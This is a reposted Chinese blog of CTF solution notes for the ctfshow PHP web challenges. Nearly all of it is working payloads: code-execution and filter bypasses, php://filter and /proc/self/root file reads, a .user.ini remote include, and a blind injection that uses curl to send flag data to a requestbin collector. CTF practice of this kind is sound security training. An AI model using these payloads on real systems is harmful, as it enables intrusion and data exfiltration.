WEB入门100+以后题目笔记

admin 2022年1月5日22:54:01CTF专场评论13 views1937字阅读6分27秒阅读模式

>

>

WEB入门100+以后题目笔记

hdxw

web100

v1是数字,v3有分号,v2没有分号,随意代码执行
?v1=1&v2=system("cat%20c*")?>//&v3=;

web101

/?v1=1&v2=echo(serialize(new%20ctfshow&v3=));
O:7:"ctfshow":3:{s:6:"dalaoA";N;s:6:"dalaoB";N;s:53:"flag_6a48e6400x2d5a530x2d460e0x2d8f1c0x2d3927d21874b4";N;}

0x2d是-

web102-web103

v1			v2		v3
phpinfo		11.1	       <?=`cat * | base64`;exit;?>  <?=`cat *`;exit;?>
scandir		11.		t.php

web105

变量覆盖,GET把$flag赋值给$suibian,POST把$suibian赋值给$error,然后die把$error带出来
POST /?suibian=flag
body=> error=suibian

web104/106

sha1碰撞,弱相等都行,甚至直接数组绕过
POST /?v2[]=1
body=> v1[]=2

web107

随便,读懂函数意思就行
POST /?v3=1
body=> v1: flag=c4ca4238a0b923820dcc509a6f75849b

web108

ereg截断
/?c=a%00778

web109/110

?v1=FilesystemIterator&v2=getcwd
如果下划线没过滤可以
?v1=FilesystemIterator&v2=session_id

110一些其他思路,不过两函数嵌套+无括号函数没绕过
eval("echo new stdClass > true || system('ls');");
eval("echo new stdClass > true || print serialize(getenv());");
eval("echo new stdClass > true || print scandir(getcwd());");

web111

/?v1=ctfshow&v2=GLOBALS

web112

?file=php://filter/resource=flag.php

web113

超过20次软连接后就可以绕过is_file
/?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

web114

过滤没了filter,用php协议就不是file了
?file=php://filter/resource=flag.php

web115

欠奉

web116

下载视频,文件尾部附加源码图片,过滤了一些不相干的关键词
?file=flag.php

web117

参考:https://www.anquanke.com/post/id/202510
自己看

web131(修复130)

见题目描述

web132

判断逻辑有问题 0&&0||1==1
/admin/?code=admin&username=admin&password=1

web133

http://requestbin.net/r/1hmza381?inspect

?F=`$F`; 无回显任意系统命令执行;
?F=`$F`; curl http://requestbin.net/r/1hmza381?a=`cat f*|grep flag|base64`;

web134

/?_POST[key1]=36d&_POST[key2]=36d

web138

post: ctfshow[]=ctfshow ctfshow[]=getFlag

web139

没有过滤
echo base64命令字符串|bas''e64 -d|s''h

web170

Content-Type: image/png

.user.ini
auto_append_file=http://ip:port/t

/upload/t.php


Firebasky

115 转义字符绕过 %0c35


特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日22:54:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  WEB入门100+以后题目笔记 http://cn-sec.com/archives/719516.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: